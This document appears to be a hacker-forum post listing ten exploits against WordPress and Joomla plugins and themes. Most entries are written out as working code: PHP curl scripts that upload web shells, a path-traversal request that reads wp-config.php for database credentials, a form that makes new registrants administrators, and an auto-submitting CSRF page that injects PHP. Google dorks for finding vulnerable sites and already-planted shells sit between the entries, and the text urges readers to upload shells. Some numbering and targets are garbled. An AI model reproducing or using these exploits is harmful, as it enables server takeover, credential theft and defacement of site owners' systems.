10 Latest Exploit

1. #1.Exploit Title:WordPress Font Uploader Shell Upload
2. Google Dork : inurl:/wp-content/plugins/font-uploader/
3. code===>
4. <?php
5.  
6. $uploadfile="yourshellname.php.ttf";
7. $ch =
8. curl_init("http://www.yourtarget.com/wp-content/plugins/font-uploader/font-upload.php");
9. curl_setopt($ch, CURLOPT_POST, true);
10. curl_setopt($ch, CURLOPT_POSTFIELDS,
11. array('font'=>"@$uploadfile",
12. 'Submit'=>'submit'));
13. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
14. $postResult = curl_exec($ch);
15. curl_close($ch);
16. print "$postResult";
17.  
18. ?>
19. ========================================================
20. #2.Exploit Title:Wordpress plugin Arbitary File Upload All Version
21. Google Dork: inurl:assets/uploadify/ site:.com [use your brain for dorking]
22. ==>after going to your desire site u will find a file/folder [uploadify] u need to click there
23. sample==>http://www.yourtarget.com/assets/themes/plugins/uploadify/uploadify.php
24. code==>
25. <?php
26. $uploadfile="yourshell.php";
27.  
28. $ch = curl_init("http://www.abhaya.org/assets/themes/plugins/uploadify/uploadify.php");
29. curl_setopt($ch, CURLOPT_POST, true);
30. curl_setopt($ch, CURLOPT_POSTFIELDS,
31. array('Filedata'=>"@$uploadfile",
32. 'folder'=>'/'));
33. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
34. $postResult = curl_exec($ch);
35. curl_close($ch);
36. print "$postResult";
37.  
38. ?>
39. ==========================================================
40. #3.Exploit Title:Wordpress Atom Themes Arbitary File Upload
41. Google Dork : inurl:"/wp-content/themes/atom/"
42. code==>
43. <?php
44. $uploadfile="yourshell.php";
45.  
46. $ch = curl_init("http://www.yourtarget.com/wp-content/themes/atom/uploadify/uploadify.php");
47. curl_setopt($ch, CURLOPT_POST, true);
48. curl_setopt($ch, CURLOPT_POSTFIELDS,
49. array('Filedata'=>"@$uploadfile",
50. 'folder'=>'/'));
51. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
52. $postResult = curl_exec($ch);
53. curl_close($ch);
54. print "$postResult";
55.  
56. ?>
57.  
58. Shell Access : http://www.yourtarget.com/wp-content/themes/atom/uploadify/uploads/randomnumber[ur shellname].php
59. =============================================================
60. #4.Exploit Title:WordPress theme soulmedic Arbitrary File Download Vulnerability
61. Google Dork:inurl:"/wp-content/themes/soulmedic/"
62. http://www.yourtarget.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
63. ===>u will find database password/name of that server
64. ================================================================
65. #5.Exploit Title:PHP File Upload Vulnerability
66. Google Dork:inurl:images/jupload.php;guest100;guest100
67. http://www.yourtarget.com/images/jupload.php;guest100;guest100 [u need to remove this ;guest100;guest100]
68. http://www.yourtarget.com/images/jupload.php [after removing ;guest100;guest100]
69. if u find uploading option then u can upload your shell
70. shell access==>http://www.yourtarget.com/images/shell.php
71. ==================================================================
72. #6.Exploit Title:Hades+ Framework Add Administrator
73. Google multiple Dork: inurl:/wp-content/themes/appius/
74. inurl:/wp-content/themes/Consultant/
75. inurl:/wp-content/themes/appius1/
76. inurl:/wp-content/themes/archin/
77. inurl:/wp-content/themes/averin/
78. inurl:/wp-content/themes/dagda/
79. inurl:/wp-content/themes/echea/
80. inurl:/wp-content/themes/felici/
81. inurl:/wp-content/themes/kmp/
82. inurl:/wp-content/themes/kmp2/
83. inurl:/wp-content/themes/liberal/
84. inurl:/wp-content/themes/liberal-media-bias/
85. inurl:/wp-content/themes/linguini/
86. inurl:/wp-content/themes/livewire/
87. inurl:/wp-content/themes/majestics/
88. inurl:/wp-content/themes/mathis/
89. inurl:/wp-content/themes/mazine/
90. inurl:/wp-content/themes/Orchestra/
91. inurl:/wp-content/themes/shopsum/
92. inurl:/wp-content/themes/shotzz/
93. inurl:/wp-content/themes/test/
94. inurl:/wp-content/themes/Viteeo/
95. inurl:/wp-content/themes/vithy/
96. inurl:/wp-content/themes/yvora/
97. inurl:/wp-content/themes/sodales/
98. Exploit:
99. <form action="http://www.yourtarget.com/wp-content/themes/[themename,i mean:/appius//Consultant//archin/etc etc]/hades_framework/option_panel/ajax.php" method="POST">
100. <input name="values[0][name]" value="users_can_register">
101. <input name="values[0][value]" value="1">
102. <input name="values[1][name]" value="admin_email">
103. <input name="values[1][value]" value="{%YOUR_EMAIL}">
104. <input name="values[2][name]" value="default_role">
105. <input name="values[2][value]" value="administrator">
106. <input name="action" value="save">
107. <input type="submit" value="Submit">
108. </form>
109. Process==>
110. 1.Change [themename,i mean:/appius//Consultant//archin/etc etc]vulnerable theme, [YOUR_EMAIL] with your email address.
111. sample==>http://www.yourtarget.com/wp-content/themes/[replace the vulnerable themename with yourmailaddress]/hades_framework/option_panel/ajax.php
112. 2. go to http://www.yourtarget.com/wp-login.php?action=register, [you will see the registration form].
113. 3. choose your username & email address and register.
114. 4. go to your email, you will find your password.
115. 5. then login & and upload your shell
116. ===============================================================
117. #7.Exploit Title: Wordpress Dandelion Themes Arbitry File Upload
118. Google Dork: inurl:/wp-content/themes/dandelion/
119. Code==>
120. <?php
121. $uploadfile="yourshell.php";
122. $ch = curl_init("http://www.yourshell.com/wp-content/themes/dandelion/functions/upload-handler.php");
123. curl_setopt($ch, CURLOPT_POST, true);
124. curl_setopt($ch, CURLOPT_POSTFIELDS,
125. array('Filedata'=>"@$uploadfile"));
126. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
127. $postResult = curl_exec($ch);
128. curl_close($ch);
129. print "$postResult";
130. ?>
131. shell link=> http://www.yourshell.com/uploads/[years]/[month]/your_shell.php
132. =====================================================================
133. #8.Exploit Title: Wordpress satoshi Themes Arbitry File Upload
134. Google Dork: inurl:/wp-content/satoshi/dandelion/
135. Code==>
136. <?php
137. $uploadfile="yourshell.php";
138. $ch = curl_init("http://www.yourshell.com/wp-content/themes/satoshi/functions/upload-handler.php");
139. curl_setopt($ch, CURLOPT_POST, true);
140. curl_setopt($ch, CURLOPT_POSTFIELDS,
141. array('Filedata'=>"@$uploadfile"));
142. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
143. $postResult = curl_exec($ch);
144. curl_close($ch);
145. print "$postResult";
146. ?>
147. ========================================================================
148. #8.Exploit Title:Mosets Tree 2.1.6 (Joomla) Template Overwrite CSRF
149. <?php
150. /**
151. * Mosets Tree 2.1.6 (Joomla) Template Overwrite CSRF
152. * 3 October 2010
153. * jdc
154. *
155. * How it works - admin template form has no nonce
156. * How to exploit - get a logged in admin to click the wrong link ;)
157. * Patched in 2.1.7
158. */
159. // change these
160. $target = 'http://localhost/joomla';
161. $exploit = '<?php echo phpinfo(); ?>';
162. /* page - any one of:
163. page_addCategory
164. page_addListing
165. page_advSearchRedirect
166. page_advSearchResults
167. page_advSearch
168. page_claim
169. page_confirmDelete
170. page_contactOwner
171. page_errorListing
172. page_error
173. page_gallery
174. page_image
175. page_index
176. page_listAlpha
177. page_listing
178. page_listListings
179. page_ownerListing
180. page_print
181. page_recommend
182. page_replyReview
183. page_reportReview
184. page_report
185. page_searchByResults
186. page_searchResults
187. page_subCatIndex
188. page_usersFavourites
189. page_usersReview
190. page_writeReview
191. sub_alphaIndex
192. sub_images
193. sub_listingDetails
194. sub_listings
195. sub_listingSummary
196. sub_map
197. sub_reviews
198. sub_subCats
199. */
200. $page = 'page_print';
201. // don't change these
202. $path = '/administrator/index.php';
203. $data = array(
204. 'pagecontent' => $exploit,
205. 'template' => 'm2',
206. 'option' => 'com_mtree',
207. 'task' => 'save_templatepage',
208. 'page' => $page
209. );
210. ?>
211. <html>
212. <body>
213. <?php if (@$_GET['iframe']) : ?>
214. <form id="csrf" action="<?php echo $target.$path; ?>" method="post">
215. <?php foreach ($data as $k => $v) : ?>
216. <input type="text" value="<?php echo htmlspecialchars($v); ?>"
217. name="<?php echo $k; ?>" />
218. <?php endforeach; ?>
219. <script type="text/javascript">
220. document.forms[0].submit();
221. </script>
222. </form>
223. <?php else : ?>
224. <h1>Mosets Tree 2.1.6 Template Overwrite CSRF Exploit</h1>
225. <p>If you were logged in as admin, you just got owned!</p>
226. <div style="display:none">
227. <iframe width="1" height="1" src="<?php __FILE__; ?>?iframe=1"></iframe>
228. </div>
229. <?php endif; ?>
230. </body>
231. </html>
232. #9.Exploit Title:wordpress potential themes vuln upload
233. 1.dork: inurl:/wp-content/themes/nuance/
234. exploit: /functions/jwpanel/scripts/valums_uploader/php.php
235.  
236. 2. dork: inurl:/wp-content/themes/lightspeed/
237. exploit: /framework/_scripts/valums_uploader/php.php
238.  
239. 3. dork: inurl:/wp-content/themes/saico/
240. exploit: /framework/_scripts/valums_uploader/php.php
241.  
242. 4. dork: inurl:/wp-content/themes/eptonic/
243. exploit: /functions/jwpanel/scripts/valums_uploader/php.php
244.  
245. 5. dork: inurl:/wp-content/themes/skinizer/
246. exploit: /framework/_scripts/valums_uploader/php.php
247.  
248. 6. dork: inurl:/wp-content/themes/area53/
249. exploit: /framework/_scripts/valums_uploader/php.php
250.  
251. 7. dork: inurl:/wp-content/themes/blinc/
252. exploit:/framework/_scripts/valums_uploader/php.php
253.  
254. csrf from html:
255.  
256. <form enctype="multipart/form-data"
257. action="http://www.yourtarget.com/wp-content/themes/nuance/functions/jwpanel/scripts/valums_uploader/php.php" method="post">
258. <input type="jpg" name="url" value="./" /><br />
259. Please choose a file: <input name="qqfile" type="file" /><br />
260. <input type="submit" value="upload" />
261. </form>
262. it the url allows you to upload your shell then u can upload it or if it says any #Error then find another one
263. shell link==>
264. http://www.yourtarget.com/wp-content/themes/yourthemename/yourshellname.php
265. http://www.yourtarget.com/wp-content/uploads/shell.php
266. #10.Exploit Title:For Noob[Dorking shell]
267. b374k m1n1
268. Quote:
269. google dork :
270. intitle:b374k m1n1 inurl:wp-content
271. intitle:"index of /" "b374k.php"
272.  
273.  
274. Dorking shell wso
275. Quote:
276. google dork :
277. intitle:"Index of /uploads" "wso.php"
278. intitle:"index of /" "wso.php"
279.  
280.  
281. Dorking Shell Madspot
282. Shell ini defaultnya tidak dipassword dan terindex google sehingga kita bisa dorking untuk menemukan shell ini.
283. Quote:
284. google dork :
285. intitle:Madspot Security site:com
286.  
287.  
288. Dorking Shell 1n73ct10n
289. Quote:
290. google dork :
291. intitle:1n73ct10n inurl:wp-content
292. intitle:"index of /" "1n73ct10n.php"]
293. ###########################################################################################
294. and u can find many tut on google for JCE/Revslider/Com_user/comfabrik/webdav/Jdownload
295. But if u r a Pro in CMS/backendweb developer then u can make your own exploit for Joomla/wordpress/Drupal/woocommerce etc etc,but u need to know very clear idea of web apps/web apps development
296. website is a huge thing[plugin/theme/component/widget/framework:joomla,wordpress,drupal,Bootstrap,phpBB,etc etc many high profile backend developer will reward you]